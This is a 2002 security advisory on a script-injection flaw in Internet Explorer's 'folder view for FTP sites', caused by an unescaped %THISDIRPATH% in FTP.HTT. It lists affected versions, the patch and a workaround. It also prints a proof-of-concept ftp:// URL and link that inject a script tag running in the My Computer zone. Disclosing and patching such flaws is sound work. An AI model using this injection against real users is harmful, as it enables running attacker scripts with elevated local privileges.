Title:

Microsoft Internet Explorer 'Folder View for FTP sites' Script Execution Vulnerability

Date:

7 June 2002 (Last modified: )

Author:

Eiji James Yoshida [zaddik@geocities.co.jp]
penetration technique research site [Advisories]

Risk:

Medium

Vulnerable:

Windows2000 SP2 IE5.5SP1
Windows2000 SP2 IE5.5SP2
Windows2000 SP2 IE6.0

Bugtraq ID:

4954

Patch:

Windows2000 SP3 (Q316890)
* This article is currently not available.

Overview:

IE allows running Malicious Scripts due to a bug in 'folder View for FTP sites'.

If you enable both an 'Enable folder view for FTP sites' IE Advanced Setting
and an 'Enable Web content in folders' Explorer Folder Option,
the script embedded in FTP Server Address will run.
(Both options are set to 'Enable' by default.)

 * It's important that the script runs in the My Computer Zone!

 

Details:

The problem is in FTP.HTT invoked by the 'folder view for FTP sites' feature.
( %SystemRoot%\WEB\FTP.HTT )

--------------------FTP.HTT--------------------
35:    <BASE href="%THISDIRPATH%\">
-----------------------------------------------

This '%THISDIRPATH%' is not escaped.

(Example 1)
[ ftp://TARGET ]
    '%THISDIRPATH%' = 'ftp://TARGET/'
    <BASE href="ftp://TARGET/\">

(Example 2)
[ ftp://"><script>alert("Exploit");</script> ]
    '%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
    <BASE href="ftp://"><script>alert("Exploit");</script>/\">

 

Exploit code:

<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>

Demonstration:

Exploit_1 [screen shot]
Exploit_2 [screen shot]

Workaround:

Disable either 'Enable folder view for FTP sites' IE Advanced Setting
or 'Enable Web content in folders' Explorer Folder Option.

Vendor status:

Microsoft was notified on 21 December 2001.

Similar vulnerabilities:

Mozilla FTP View Cross-Site Scripting Vulnerability

Opera FTP View Cross-Site Scripting Vulnerability

 Copyright(c) 2002 Eiji James Yoshida. All rights reserved